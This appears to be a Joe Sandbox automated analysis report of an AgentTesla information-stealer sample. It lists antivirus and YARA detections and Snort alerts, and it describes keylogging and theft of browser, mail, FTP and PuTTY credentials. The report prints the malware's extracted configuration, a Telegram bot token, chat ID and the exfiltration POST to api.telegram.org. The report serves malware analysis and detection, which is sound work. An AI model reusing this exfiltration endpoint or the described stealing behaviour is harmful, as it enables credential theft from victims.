Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Overview

General Information

Sample name:17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe
Analysis ID:1430866
MD5:ab696103426e266ed3729c899e11e778
SHA1:12aa01403e8f348853598d6da5b304da02cc3d57
SHA256:7151fdf1eb6797e332cdd21c6084e1b338f84fb6652284599370cf609776a676
Tags:base64-decodedexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected Telegram RAT
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Detected potential crypto function
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"C2 url": "https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendMessage?chat_id=595808702"}
SourceRuleDescriptionAuthorStrings
17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
        • 0x33cfe:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
        • 0x33d70:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
        • 0x33dfa:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
        • 0x33e8c:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
        • 0x33ef6:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
        • 0x33f68:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
        • 0x33ffe:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
        • 0x3408e:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
        SourceRuleDescriptionAuthorStrings
        sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.2889163730.00000000026DA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000000.00000002.2889163730.00000000026BE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    Click to see the 6 entries
                    SourceRuleDescriptionAuthorStrings
                    0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                        0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                          0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                          • 0x33cfe:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                          • 0x33d70:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                          • 0x33dfa:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                          • 0x33e8c:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                          • 0x33ef6:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                          • 0x33f68:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                          • 0x33ffe:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                          • 0x3408e:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                          No Sigma rule has matched
                          Timestamp:04/24/24-10:16:17.850504
                          SID:2851779
                          Source Port:49730
                          Destination Port:443
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeAvira: detected
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendMessage?chat_id=595808702"}
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.3872.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendMessage"}
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeVirustotal: Detection: 63%Perma Link
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeReversingLabs: Detection: 71%
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeJoe Sandbox ML: detected
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                          Networking

                          barindex
                          Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49730 -> 149.154.167.220:443
                          Source: unknownDNS query: name: api.telegram.org
                          Source: global trafficHTTP traffic detected: POST /bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc64479371e3d5Host: api.telegram.orgContent-Length: 914Expect: 100-continueConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownDNS traffic detected: queries for: api.telegram.org
                          Source: unknownHTTP traffic detected: POST /bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc64479371e3d5Host: api.telegram.orgContent-Length: 914Expect: 100-continueConnection: Keep-Alive
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2889163730.00000000026DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2889163730.00000000026C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeString found in binary or memory: https://account.dyn.com/
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2889163730.00000000026C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeString found in binary or memory: https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2889163730.00000000026C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendDocument
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 7KG.cs.Net Code: vGrp

                          System Summary

                          barindex
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, type: SAMPLEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                          Source: 0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeCode function: 0_2_025B4A480_2_025B4A48
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeCode function: 0_2_025B9B200_2_025B9B20
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeCode function: 0_2_025B3E300_2_025B3E30
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeCode function: 0_2_025BCD980_2_025BCD98
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeCode function: 0_2_025B41780_2_025B4178
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2888404652.00000000009BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2888092291.00000000006F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000000.1640893595.000000000027E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename397ccd64-9aef-40f4-b35a-72c6ae1991b9.exe4 vs 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeBinary or memory string: OriginalFilename397ccd64-9aef-40f4-b35a-72c6ae1991b9.exe4 vs 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                          Source: 0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 1UT6pzc0M.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, DnQOD3M.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 01seU.csCryptographic APIs: 'CreateDecryptor'
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, iUDwvr7Gz.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, XUu2qKyuF6.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, aZathEIgR.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, l50VLEll22.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, l50VLEll22.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeBinary string: ID: 0x{0:X}qSize of the SerializedPropertyStore is less than 8 ({0})/StoreSize: {0} (0x{0X})3\Device\LanmanRedirector\[Failed to retrieve system handle information.
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeMutant created: NULL
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeVirustotal: Detection: 63%
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeReversingLabs: Detection: 71%
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: vaultcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
